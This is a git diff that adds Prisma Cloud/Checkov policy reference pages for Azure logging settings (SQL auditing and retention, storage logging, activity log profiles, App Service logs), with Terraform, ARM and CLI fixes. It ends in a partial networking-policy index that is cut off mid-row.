+We recommend you enable auditing at the server level, ensuring all existing and newly created databases on the SQL server instance are audited. + +NOTE: An auditing policy applied to a SQL database does not override an auditing policy or settings applied on the SQL server where the database is hosted. + +//// +=== Fix - Runtime + + +* Azure Portal To change the policy using the Azure Portal, follow these steps:* + + + +. Log in to the Azure Portal at https://portal.azure.com. + +. Navigate to * SQL servers*. + +. For each server instance: a) Click * Auditing*. ++ +b) Set * Auditing* to * On*. + + +* CLI Command* + + +To get the list of all SQL Servers, use the following command: `Get-AzureRmSqlServer` +To enable auditing for each Server, use the following command: +---- +Set-AzureRmSqlServerAuditingPolicy +-ResourceGroupName & lt;resource group name> +-ServerName & lt;server name> +-AuditType & lt;audit type> +-StorageAccountName & lt;storage account name> +---- +//// + +=== Fix - Buildtime + + +*ARM* + + +* *Resource:* Microsoft.Sql/servers/databases + + +[source,json] +---- +{ + "type": "Microsoft.Sql/servers", + "apiVersion": "2019-06-01-preview", + "location": "[parameters('location')]", + "name": "[parameters('sqlServerName')]", + "identity": "[if(parameters('isStorageBehindVnet'), json('{\"type\":\"SystemAssigned\"}'), json('null'))]", + "properties": { + "administratorLogin": "[parameters('sqlAdministratorLogin')]", + "administratorLoginPassword": "[parameters('sqlAdministratorLoginPassword')]", + "version": "12.0" + }, + "tags": { + "displayName": "[parameters('sqlServerName')]" + }, + "resources": [ + { + "type": "auditingSettings", + "apiVersion": "2019-06-01-preview", + "name": "DefaultAuditingSettings", + "dependsOn": [ + "[parameters('sqlServerName')]", + "[parameters('storageAccountName')]", + "[extensionResourceId(resourceId('Microsoft.Storage/storageAccounts', parameters('storageAccountName')), 'Microsoft.Authorization/roleAssignments/', 
variables('uniqueRoleGuid'))]" + ], + "properties": { ++ "state": "Enabled", + "storageEndpoint": "[reference(resourceId('Microsoft.Storage/storageAccounts', parameters('storageAccountName')), '2019-06-01').PrimaryEndpoints.Blob]", + "storageAccountAccessKey": "[if(parameters('isStorageBehindVnet'), json('null'), listKeys(resourceId('Microsoft.Storage/storageAccounts', parameters('storageAccountName')), '2019-06-01').keys[0].value)]", + "storageAccountSubscriptionId": "[subscription().subscriptionId]", + "isStorageSecondaryKeyInUse": false + } + } + ] +} +---- + + +*Terraform* + + +* *Resource:* azurerm_sql_server, azurerm_mssql_server +* *Field:* extended_auditing_policy + + +[source,go] +---- +resource "azurerm_sql_server" "example" { + ... + + extended_auditing_policy { + storage_endpoint = azurerm_storage_account.example.primary_blob_endpoint + storage_account_access_key = azurerm_storage_account.example.primary_access_key + storage_account_access_key_is_secondary = true + retention_in_days = 90 + } +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-logging-policies/bc-azr-logging-3.adoc b/code-security/policy-reference/azure-policies/azure-logging-policies/bc-azr-logging-3.adoc new file mode 100644 index 000000000..f9230b976 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-logging-policies/bc-azr-logging-3.adoc @@ -0,0 +1,91 @@ +== Azure SQL Server audit log retention is not greater than 90 days +// Azure SQL Server audit logs retention less than 90 days + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 6b2bdb87-2865-4348-af5d-0b766186bc9d + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/common/graph/checks_infra/base_check.py[CKV_AZURE_24] + +|Severity +|HIGH + +|Subtype +|Build +// ,Run + +|Frameworks +|ARM,Terraform,Bicep,TerraformPlan + +|=== + + + +=== Description + + +Audit Logs can be used to check for anomalies and give insight into
suspected breaches or misuse of information and access. +We recommend you configure SQL server audit retention to be greater than 90 days. + +//// +=== Fix - Runtime + + +*Azure Portal* To change the policy using the Azure Portal, follow these steps: + + + +. Log in to the Azure Portal at https://portal.azure.com. + +. Navigate to *SQL servers*. + +. For each server instance: a) Click *Auditing*. ++ +b) Select *Storage Details*. ++ +c) Set *Retention (days)* to *greater than 90 days*. ++ +d) Click *OK*. ++ +e) Click *Save*. + + +*CLI Command* + + +To set the retention policy for more than or equal to 90 days, for each server, use the following command: +---- +Set-AzureRmSqlServerAuditing +-ResourceGroupName <resource group name> +-ServerName <server name> +-RetentionInDays <number of days to retain the audit logs, 90 days minimum> +---- +//// +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_sql_server, azurerm_mssql_server +* *Arguments:* retention_in_days + + +[source,go] +---- +resource "azurerm_sql_server" "example" { + ... 
+ extended_auditing_policy { + storage_endpoint = azurerm_storage_account.example.primary_blob_endpoint + storage_account_access_key = azurerm_storage_account.example.primary_access_key + storage_account_access_key_is_secondary = true + + retention_in_days = <90 or greater> + } +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-logging-policies/enable-requests-on-storage-logging-for-queue-service.adoc b/code-security/policy-reference/azure-policies/azure-logging-policies/enable-requests-on-storage-logging-for-queue-service.adoc new file mode 100644 index 000000000..4db7ce69e --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-logging-policies/enable-requests-on-storage-logging-for-queue-service.adoc @@ -0,0 +1,129 @@ +== Azure storage account logging for queues is disabled +// Azure Queue Storage Service Account logging for queues disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| fde9482f-3ac2-43f6-bda2-bf2013074acd + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/StorageAccountLoggingQueueServiceEnabled.py[CKV_AZURE_33] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|ARM,Terraform,Bicep,TerraformPlan + +|=== + + + +=== Description + + +The *Azure Queue Storage* service stores messages that may be read by any client with access to the storage account. +A queue may contain an unlimited number of messages, each of which can be up to 64KB in size when using version 2011-08-18 or newer. +*Storage Logging* takes place server-side recording details in the storage account for both successful and failed requests. +These logs allow users to see the details of read, write, and delete operations against the queues. 
+*Storage Logging* log entries contain the following information about individual requests: timing information (for example, start time, end-to-end latency, and server latency), authentication details, concurrency information, and the size of request and response messages. +*Storage Analytics* logs contain detailed information about successful and failed requests to a storage service. +This information can be used to monitor individual requests and to diagnose issues with a storage service. +Requests are logged on a best-effort basis. +*Storage Analytics* logging is not enabled by default for your storage account. +//// +=== Fix - Runtime + + +*Azure Portal* To change the policy using the Azure Portal, follow these steps: + + + +. Log in to the Azure Portal at https://portal.azure.com. + +. Navigate to *Storage Accounts*. + +. Select the specific *Storage Account*. + +. From the *Monitoring* (classic) section, select the *Diagnostics logs* (classic) blade. + +. Set the *Status* to *On*. + +. Select *Queue properties*. + +. Navigate to the *Logging* section to enable *Storage Logging for Queue service*. + +. Select the *Read*, *Write* and *Delete* options.
+ + +*CLI Command* + + +To enable *Storage Logging for the Queue service*, use the following command: `az storage logging update --account-name <storageAccountName> --account-key <storageAccountKey> --services q --log rwd --retention 90` +//// +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_storage_account +* *Arguments:* logging + hour_metrics + minute_metrics + + +[source,go] +---- +resource "azurerm_storage_account" "example" { + name = "example" + resource_group_name = data.azurerm_resource_group.example.name + location = data.azurerm_resource_group.example.location + account_tier = "Standard" + account_replication_type = "GRS" + queue_properties { ++ logging { + delete = true + read = true + write = true + version = "1.0" + retention_policy_days = 10 + } + + } +} +---- + +The *logging* block should be enough to enable logging. +However, because `terraform apply` might otherwise fail, it is recommended to also configure the *hour_metrics* and *minute_metrics* blocks within `queue_properties`. + + +[source,go] +---- ++ hour_metrics { + enabled = true + include_apis = true + version = "1.0" + retention_policy_days = 10 + } + ++ minute_metrics { + enabled = true + include_apis = true + version = "1.0" + retention_policy_days = 10 + } +---- diff --git a/code-security/policy-reference/azure-policies/azure-logging-policies/ensure-audit-profile-captures-all-activities.adoc b/code-security/policy-reference/azure-policies/azure-logging-policies/ensure-audit-profile-captures-all-activities.adoc new file mode 100644 index 000000000..a5fe313c7 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-logging-policies/ensure-audit-profile-captures-all-activities.adoc @@ -0,0 +1,73 @@ +== Azure Monitor log profile does not capture all activities +// Azure Monitor log profile not configured to collect logs for all categories + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 64f0ec41-cdcb-42e4-b556-eb66946a62ff + +|Checkov
Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/arm/checks/resource/MonitorLogProfileCategories.py[CKV_AZURE_38] + +|Severity +|LOW + +|Subtype +|Build +//, Run + +|Frameworks +|ARM,Terraform,Bicep,TerraformPlan + +|=== + + + +=== Description + + +A log profile controls how the activity log is exported. +Configuring the log profile to collect logs for the categories *Write*, *Delete* and *Action* ensures that all control/management plane activities performed on the subscription are exported. +We recommend you configure the log profile to export all activities from the control/management plane. +//// +=== Fix - Runtime + + +*Azure Portal* The Azure portal currently has no provision to check or set categories. + + + + +*CLI Command* + + +To update an existing default log profile, use the following command: `az monitor log-profiles update --name default` +//// +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_monitor_log_profile +* *Arguments:* categories + + +[source,go] +---- +resource "azurerm_monitor_log_profile" "example" { + ...
+ categories = [ + + "Action", + + "Delete", + + "Write", + ] +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-logging-policies/ensure-storage-logging-is-enabled-for-blob-service-for-read-requests.adoc b/code-security/policy-reference/azure-policies/azure-logging-policies/ensure-storage-logging-is-enabled-for-blob-service-for-read-requests.adoc new file mode 100644 index 000000000..26a3eb6fe --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-logging-policies/ensure-storage-logging-is-enabled-for-blob-service-for-read-requests.adoc @@ -0,0 +1,98 @@ +== Azure storage account logging setting for blobs is disabled +// Azure storage account logging setting for blobs disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 02cd347f-9091-4cb3-a221-e9f0e1cebabf + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForBlobService.yaml[CKV2_AZURE_21] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform, TerraformPlan + +|=== + + + +=== Description + + +The Storage Blob service provides scalable, cost-efficient object storage in the cloud. +Storage Logging happens server-side and allows details for both successful and failed requests to be recorded in the storage account. +These logs allow users to see the details of read, write, and delete operations against the blobs. +Storage Logging log entries contain the following information about individual requests: timing information such as start time, end-to-end latency, and server latency; authentication details; concurrency information; and the sizes of the request and response messages. +Storage Analytics logs contain detailed information about successful and failed requests to a storage service. +This information can be used to monitor individual requests and to diagnose issues with a storage service.
+Requests are logged on a best-effort basis. +We recommend that you ensure Storage Logging is enabled for Blob Service for Read Requests. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_resource_group, azurerm_log_analytics_workspace, azurerm_storage_account, azurerm_log_analytics_storage_insights, azurerm_storage_container + + +[source,go] +---- +resource "azurerm_resource_group" "resource_group_ok" { + name = "example-resources" + location = "West Europe" +} + + +resource "azurerm_log_analytics_workspace" "analytics_workspace_ok" { + name = "exampleworkspace" + location = azurerm_resource_group.resource_group_ok.location + resource_group_name = azurerm_resource_group.resource_group_ok.name + sku = "PerGB2018" + retention_in_days = 30 +} + + +resource "azurerm_storage_account" "storage_account_ok" { + name = "examplestoracc" + resource_group_name = azurerm_resource_group.resource_group_ok.name + location = azurerm_resource_group.resource_group_ok.location + account_tier = "Standard" + account_replication_type = "LRS" +} + + +resource "azurerm_log_analytics_storage_insights" "analytics_storage_insights_ok" { + name = "example-storageinsightconfig" + resource_group_name = azurerm_resource_group.resource_group_ok.name + workspace_id = azurerm_log_analytics_workspace.analytics_workspace_ok.id + + storage_account_id = azurerm_storage_account.storage_account_ok.id + storage_account_key = azurerm_storage_account.storage_account_ok.primary_access_key + blob_container_names = [azurerm_storage_container.storage_container_ok.name] +} + + +resource "azurerm_storage_container" "storage_container_ok" { + name = "my-awesome-content" + storage_account_name = azurerm_storage_account.storage_account_ok.name + container_access_type = "blob" +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-logging-policies/ensure-storage-logging-is-enabled-for-table-service-for-read-requests.adoc
b/code-security/policy-reference/azure-policies/azure-logging-policies/ensure-storage-logging-is-enabled-for-table-service-for-read-requests.adoc new file mode 100644 index 000000000..4de734781 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-logging-policies/ensure-storage-logging-is-enabled-for-table-service-for-read-requests.adoc @@ -0,0 +1,96 @@ +== Azure storage account logging setting for tables is disabled +// Azure storage account logging setting for tables disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| cf24f5cf-c1c0-4029-943f-b61620a7d893 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForTableService.yaml[CKV2_AZURE_20] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform, TerraformPlan + +|=== + + + +=== Description + + +The Storage Table service stores structured NoSQL data in the cloud, providing a key/attribute store with a schemaless design. +Storage Logging happens server-side and allows details for both successful and failed requests to be recorded in the storage account. +These logs allow users to see the details of read, write, and delete operations against the tables. +Storage Logging log entries contain the following information about individual requests: timing information such as start time, end-to-end latency, and server latency; authentication details; concurrency information; and the sizes of the request and response messages. +Storage Analytics logs contain detailed information about successful and failed requests to a storage service. +This information can be used to monitor individual requests and to diagnose issues with a storage service. +Requests are logged on a best-effort basis.
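+
+Table-service logging can also be enabled at runtime with the Azure CLI, mirroring the queue-service command used for the queue logging policy; this is a sketch, assuming the account name and key placeholders are substituted and that `--services t` selects the table service:
+
+----
+az storage logging update --account-name <storageAccountName> --account-key <storageAccountKey> --services t --log rwd --retention 90
+----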
+ +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_resource_group, azurerm_log_analytics_workspace, azurerm_storage_account, azurerm_log_analytics_storage_insights, azurerm_storage_table + + +[source,go] +---- +resource "azurerm_resource_group" "blobExample_ok" { + name = "example-resources" + location = "West Europe" +} + + +resource "azurerm_log_analytics_workspace" "blobExample_ok" { + name = "exampleworkspace" + location = azurerm_resource_group.blobExample_ok.location + resource_group_name = azurerm_resource_group.blobExample_ok.name + sku = "PerGB2018" + retention_in_days = 30 +} + + +resource "azurerm_storage_account" "blobExample_ok" { + name = "examplestoracc" + resource_group_name = azurerm_resource_group.blobExample_ok.name + location = azurerm_resource_group.blobExample_ok.location + account_tier = "Standard" + account_replication_type = "LRS" +} + + +resource "azurerm_log_analytics_storage_insights" "blobExample_ok" { + name = "example-storageinsightconfig" + resource_group_name = azurerm_resource_group.blobExample_ok.name + workspace_id = azurerm_log_analytics_workspace.blobExample_ok.id + + storage_account_id = azurerm_storage_account.blobExample_ok.id + storage_account_key = azurerm_storage_account.blobExample_ok.primary_access_key + table_names = ["myexampletable"] +} + + +resource "azurerm_storage_table" "blobExample_ok" { + name = "myexampletable" + storage_account_name = azurerm_storage_account.blobExample_ok.name +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-logging-policies/ensure-that-app-service-enables-failed-request-tracing.adoc b/code-security/policy-reference/azure-policies/azure-logging-policies/ensure-that-app-service-enables-failed-request-tracing.adoc new file mode 100644 index 000000000..3eae3df43 --- /dev/null +++
b/code-security/policy-reference/azure-policies/azure-logging-policies/ensure-that-app-service-enables-failed-request-tracing.adoc @@ -0,0 +1,58 @@ +== App service does not enable failed request tracing +// Failed request tracing disabled for Azure App Services + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 89c672d6-7436-4eb7-9565-e84ab87edc6c + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AppServiceEnableFailedRequest.py[CKV_AZURE_66] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +By enabling failed request tracing for your app service, you can collect detailed traces for failed requests and use them to troubleshoot issues with your app and identify potential problems. +This can help to ensure that your app is running smoothly and is able to handle any errors that might occur. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_app_service +* *Arguments:* logs.failed_request_tracing_enabled + + +[source,go] +---- +resource "azurerm_app_service" "example" { + ... + + logs { + + failed_request_tracing_enabled = true + } + + ...
+} +---- diff --git a/code-security/policy-reference/azure-policies/azure-logging-policies/ensure-that-app-service-enables-http-logging.adoc b/code-security/policy-reference/azure-policies/azure-logging-policies/ensure-that-app-service-enables-http-logging.adoc new file mode 100644 index 000000000..a60ac05cf --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-logging-policies/ensure-that-app-service-enables-http-logging.adoc @@ -0,0 +1,75 @@ +== App service does not enable HTTP logging +// HTTP logging disabled for Azure App Services + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 18aec02c-ae0e-4e2c-9e6f-72820d1b2909 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AppServiceHttpLoggingEnabled.py[CKV_AZURE_63] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +By enabling HTTP logging for your app service, you can collect request and response logs and use them to monitor and troubleshoot your app, as well as identify any potential security issues or threats. +This can help to ensure that your app is running smoothly and is secure from potential attacks.
+ +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_app_service +* *Arguments:* logs.http_logs + + +[source,go] +---- +resource "azurerm_app_service" "example" { + name = "example-app-service" + location = azurerm_resource_group.example.location + resource_group_name = azurerm_resource_group.example.name + app_service_plan_id = azurerm_app_service_plan.example.id + ++ logs { ++ http_logs { ++ file_system { + retention_in_days = 4 + retention_in_mb = 10 + } + } + + } + + app_settings = { + "SOME_KEY" = "some-value" + } + + + connection_string { + name = "Database" + type = "SQLServer" + value = "Server=some-server.mydomain.com;Integrated Security=SSPI" + } + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-logging-policies/ensure-the-storage-container-storing-the-activity-logs-is-not-publicly-accessible.adoc b/code-security/policy-reference/azure-policies/azure-logging-policies/ensure-the-storage-container-storing-the-activity-logs-is-not-publicly-accessible.adoc new file mode 100644 index 000000000..3f253ec32 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-logging-policies/ensure-the-storage-container-storing-the-activity-logs-is-not-publicly-accessible.adoc @@ -0,0 +1,95 @@ +== Azure Storage account container storing activity logs is publicly accessible +// Azure Storage account container storing activity logs publicly accessible + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 8a2315b0-70b9-477b-bd5c-41cb92a7b726 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageContainerActivityLogsNotPublic.yaml[CKV2_AZURE_8] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +The storage account container containing the activity log export should not be publicly accessible.
+Allowing public access to activity log content may aid an adversary in identifying weaknesses in the affected account's use or configuration. + +Configuring the container access policy to *private* removes access to the container for everyone except owners of the storage account. + +The access policy must then be set explicitly to grant access to other desired users. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_storage_container, azurerm_storage_account, azurerm_monitor_activity_log_alert +* *Arguments:* container_access_type (of _azurerm_storage_container_) + + +[source,go] +---- +resource "azurerm_storage_container" "ok_container" { + name = "vhds" + storage_account_name = azurerm_storage_account.ok_account.name ++ container_access_type = "private" +} + + +resource "azurerm_storage_account" "ok_account" { + name = "examplesa" + resource_group_name = azurerm_resource_group.main.name + location = azurerm_resource_group.main.location + account_tier = "Standard" + account_replication_type = "GRS" +} + + +resource "azurerm_monitor_activity_log_alert" "ok_monitor_activity_log_alert" { + name = "example-activitylogalert" + resource_group_name = azurerm_resource_group.main.name + scopes = [azurerm_resource_group.main.id] + description = "This alert will monitor updates to a specific storage account."
+ + criteria { + resource_id = azurerm_storage_account.ok_account.id + operation_name = "Microsoft.Storage/storageAccounts/write" + category = "Recommendation" + } + + + + action { + action_group_id = azurerm_monitor_action_group.main.id + + webhook_properties = { + from = "terraform" + } + + } +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-logging-policies/set-activity-log-retention-to-365-days-or-greater.adoc b/code-security/policy-reference/azure-policies/azure-logging-policies/set-activity-log-retention-to-365-days-or-greater.adoc new file mode 100644 index 000000000..41cd9eb30 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-logging-policies/set-activity-log-retention-to-365-days-or-greater.adoc @@ -0,0 +1,142 @@ +== Activity Log Retention should not be set to less than 365 days +// Activity Log retention less than 365 days + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| a9937384-1ee3-430c-acda-fb97e357bfcd + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/arm/checks/resource/MonitorLogProfileRetentionDays.py[CKV_AZURE_37] + +|Severity +|MEDIUM + +|Subtype +|Build +// , Run + +|Frameworks +|ARM,Terraform,Bicep,TerraformPlan + +|=== + + + +=== Description + + +A log profile controls how the activity log is exported and retained. +Since the average time to detect a breach is 210 days, the activity log should be retained for 365 days or more, providing time to respond to any incidents. +We recommend you set activity log retention to 365 days or greater. +//// +=== Fix - Runtime + + +*Azure Portal* To change the policy using the Azure Portal, follow these steps: + + + +. Log in to the Azure Portal at https://portal.azure.com. + +. Navigate to the *Activity log*. + +. Select *Export*. + +. Set *Retention (days)* to *365* or *0*. + +. Click *Save*.
+ + +*CLI Command* + + +To set Activity log Retention (days) to *365 or greater*, use the following command: +---- +az monitor log-profiles update +--name <logProfileName> +--set retentionPolicy.days=<number of days> retentionPolicy.enabled=true +---- + + +*To store logs forever (indefinitely), use the following command:* + + +---- +az monitor log-profiles update +--name <logProfileName> +--set retentionPolicy.days=0 retentionPolicy.enabled=false +---- +//// +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_monitor_log_profile +* *Arguments:* retention_policy + + +*Option 1* + + + + +[source,go] +---- +resource "azurerm_monitor_log_profile" "example" { + name = "default" + categories = [ + "Action", + "Delete", + "Write", + ] + locations = [ + "westus", + "global", + ] ++ retention_policy { ++ enabled = true ++ days = 365 + } + +} +---- + + +*Option 2* + + + + +[source,go] +---- +resource "azurerm_monitor_log_profile" "example" { + name = "default" + categories = [ + "Action", + "Delete", + "Write", + ] + locations = [ + "westus", + "global", + ] ++ retention_policy { ++ enabled = false ++ days = 0 + } + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-logging-policies/tbdensure-that-app-service-enables-detailed-error-messages.adoc b/code-security/policy-reference/azure-policies/azure-logging-policies/tbdensure-that-app-service-enables-detailed-error-messages.adoc new file mode 100644 index 000000000..929539036 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-logging-policies/tbdensure-that-app-service-enables-detailed-error-messages.adoc @@ -0,0 +1,57 @@ +== App service disables detailed error messages +// Azure App Service detailed error messages disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| bda56a63-e57e-4791-8a3e-e620c142cec2 + +|Checkov Check ID +|
https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AppServiceDetailedErrorMessagesEnabled.py[CKV_AZURE_65] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Detailed error messages provide more information about an error that occurs in your app, such as the error code, the line of code where the error occurred, and a description of the error. +This information can be very useful for debugging issues with your app and identifying the root cause of the problem. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_app_service +* *Arguments:* logs.detailed_error_messages_enabled + + +[source,go] +---- +resource "azurerm_app_service" "example" { + ... ++ logs { ++ detailed_error_messages_enabled = true ++ } + ... +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-networking-policies/azure-networking-policies.adoc b/code-security/policy-reference/azure-policies/azure-networking-policies/azure-networking-policies.adoc new file mode 100644 index 000000000..c9a8ca963 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-networking-policies/azure-networking-policies.adoc @@ -0,0 +1,310 @@ +== Azure Networking Policies + +[width=85%] +[cols="1,1,1"] +|=== +|Policy|Checkov Check ID| Severity + +|xref:bc-azr-networking-1.adoc[Azure instance does not authenticate using SSH keys] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AzureInstancePassword.py[CKV_AZURE_1] +|HIGH + + +|xref:bc-azr-networking-10.adoc[Azure PostgreSQL database server with SSL connection disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/PostgreSQLServerSSLEnforcementEnabled.py[CKV_AZURE_29] +|MEDIUM + + +|xref:bc-azr-networking-11.adoc[Azure PostgreSQL database server with log checkpoints parameter disabled] +|
https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/PostgreSQLServerLogCheckpointsEnabled.py[CKV_AZURE_30] +|MEDIUM + + +|xref:bc-azr-networking-12.adoc[Azure PostgreSQL database server with log connections parameter disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/PostgreSQLServerLogConnectionsEnabled.py[CKV_AZURE_31] +|MEDIUM + + +|xref:bc-azr-networking-13.adoc[Azure PostgreSQL database server with connection throttling parameter is disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/arm/checks/resource/PostgreSQLServerConnectionThrottlingEnabled.py[CKV_AZURE_32] +|MEDIUM + + +|xref:bc-azr-networking-17.adoc[Azure MariaDB database server with SSL connection disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/arm/checks/resource/MariaDBSSLEnforcementEnabled.py[CKV_AZURE_47] +|HIGH + + +|xref:bc-azr-networking-2.adoc[Azure RDP Internet access is not restricted] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/NSGRuleRDPAccessRestricted.py[CKV_AZURE_9] +|HIGH + + +|xref:bc-azr-networking-3.adoc[Azure Network Security Group allows all traffic on SSH (port 22)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/arm/checks/resource/NSGRuleSSHAccessRestricted.py[CKV_AZURE_10] +|HIGH + + +|xref:bc-azr-networking-4.adoc[Azure SQL Servers Firewall rule allow ingress access from 0.0.0.0/0] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/SQLServerNoPublicAccess.py[CKV_AZURE_11] +|HIGH + + +|xref:bc-azr-networking-5.adoc[Azure App Service Web app doesn't redirect HTTP to HTTPS] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AppServiceHTTPSOnly.py[CKV_AZURE_14] +|MEDIUM + + +|xref:bc-azr-networking-6.adoc[Azure App Service Web app doesn't use latest TLS version] +| 
https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AppServiceMinTLSVersion.py[CKV_AZURE_15] +|MEDIUM + + +|xref:bc-azr-networking-7.adoc[Azure App Service Web app client certificate is disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/arm/checks/resource/AppServiceClientCertificate.py[CKV_AZURE_17] +|MEDIUM + + +|xref:bc-azr-networking-8.adoc[Azure App Service Web app doesn't use HTTP 2.0] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AppServiceHttps20Enabled.py[CKV_AZURE_18] +|MEDIUM + + +|xref:bc-azr-networking-9.adoc[Azure MySQL Database Server SSL connection is disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/MySQLServerSSLEnforcementEnabled.py[CKV_AZURE_28] +|MEDIUM + + +|xref:enable-trusted-microsoft-services-for-storage-account-access.adoc[Azure Storage Account 'Trusted Microsoft Services' access not enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/bicep/checks/resource/azure/StorageAccountAzureServicesAccessEnabled.py[CKV_AZURE_36] +|MEDIUM + + +|xref:ensure-application-gateway-waf-prevents-message-lookup-in-log4j2.adoc[Azure Application Gateway Web application firewall (WAF) policy rule for Remote Command Execution is disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AppGatewayWAFACLCVE202144228.py[CKV_AZURE_135] +|MEDIUM + + +|xref:ensure-azure-acr-is-set-to-disable-public-networking.adoc[Azure Container registries Public access to All networks is enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/ACRPublicNetworkAccessDisabled.py[CKV_AZURE_139] +|LOW + + +|xref:ensure-azure-aks-cluster-nodes-do-not-have-public-ip-addresses.adoc[Azure Redis Cache does not use the latest version of TLS encryption] +| 
